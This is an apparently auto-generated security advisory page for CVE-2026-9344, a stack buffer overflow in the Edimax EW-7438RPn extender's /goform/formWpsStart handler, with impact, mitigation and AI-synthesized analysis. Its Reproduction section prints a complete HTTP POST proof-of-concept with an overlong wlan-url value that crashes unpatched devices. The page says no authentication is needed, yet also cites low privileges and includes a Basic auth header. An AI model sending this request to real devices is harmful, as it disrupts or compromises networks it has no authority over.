VYPR
← All advisories
High severity8.8NVD Advisory· Published May 24, 2026· Updated May 26, 2026

CVE-2026-9344

CVE-2026-9344

Description

A stack-based buffer overflow in Edimax EW-7438RPn up to v1.31 allows remote attackers to crash the device or execute arbitrary code.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A stack-based buffer overflow in Edimax EW-7438RPn up to v1.31 allows remote attackers to crash the device or execute arbitrary code.

Vulnerability

A stack-based buffer overflow exists in the Edimax EW-7438RPn wireless extender running firmware up to version 1.31. The vulnerability resides in the formWpsStart function within the /goform/formWpsStart endpoint of the webs component. The pinCode and wlan-url arguments are copied into a stack-based local variable without proper length checking, leading to overflow when an overly long string is supplied. The vendor was contacted but did not respond [1].

Exploitation

An attacker can send a crafted HTTP POST request to /goform/formWpsStart with an excessively long wlan-url parameter. No authentication is required beyond basic network access, and the exploit has been publicly disclosed with a proof-of-concept. The unvalidated input overwrites the stack return address, enabling control of program flow [1].

Impact

Successful exploitation causes a denial of service (device crash) and potentially arbitrary code execution with the privileges of the webs process. This could lead to full compromise of the extender, including traffic interception, configuration alteration, or use as a pivot point within the network [1].

Mitigation

No official fix has been released by Edimax as the vendor did not respond to the disclosure. Users should consider replacing or isolating the device, as no workaround is available. The likely end-of-life status of EW-7438RPn means a patch may never be issued [1].

References
  1. my_vuln/Edimax/vuln_2/2.md at main · wudipjq/my_vuln

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The `formWpsStart` function in the `webs` component does not validate the length of the `pinCode` or `wlan-url` parameters, leading to a stack-based buffer overflow."

Attack vector

An attacker can remotely trigger this vulnerability by sending a crafted HTTP POST request to the `/goform/formWpsStart` endpoint. The request should manipulate the `pinCode` or `wlan-url` parameters with overly long data. This input is directly copied to a local variable on the stack without any length checks, causing a buffer overflow and potentially allowing arbitrary code execution [ref_id=1]. The exploit has been publicly disclosed and may be in use [ref_id=1].

Affected code

The vulnerability resides within the `formWpsStart` function in the `webs` binary. Specifically, the `pinCode` and `wlan-url` parameters are directly processed without input validation. This lack of checking allows overly long input to be copied into a stack-allocated buffer, leading to a buffer overflow [ref_id=1].

What the fix does

The advisory does not specify any patches or fixes. It suggests that input extraction should include checks on the string content to prevent this issue [ref_id=1]. Therefore, no fix is currently available.

Preconditions

  • networkThe target device must be accessible over the network.
  • authThe attacker needs to bypass authentication or have low privileges, as indicated by the CVSS vector (PR:L).
  • inputThe attacker must provide overly long data for the 'pinCode' or 'wlan-url' parameters.

Reproduction

POST /goform/formWpsStart HTTP/1.1 Host: 192.168.0.4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 62 Origin: http://192.168.0.4 Authorization: Basic YWRtaW46MTIzNA== Connection: keep-alive Referer: http://192.168.0.4/wpsconfig.asp Cookie: language=16 Upgrade-Insecure-Requests: 1 Priority: u=4

confMode=0&configOption=pbc&pinCode=&wlan-url=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Generated on Jun 6, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

1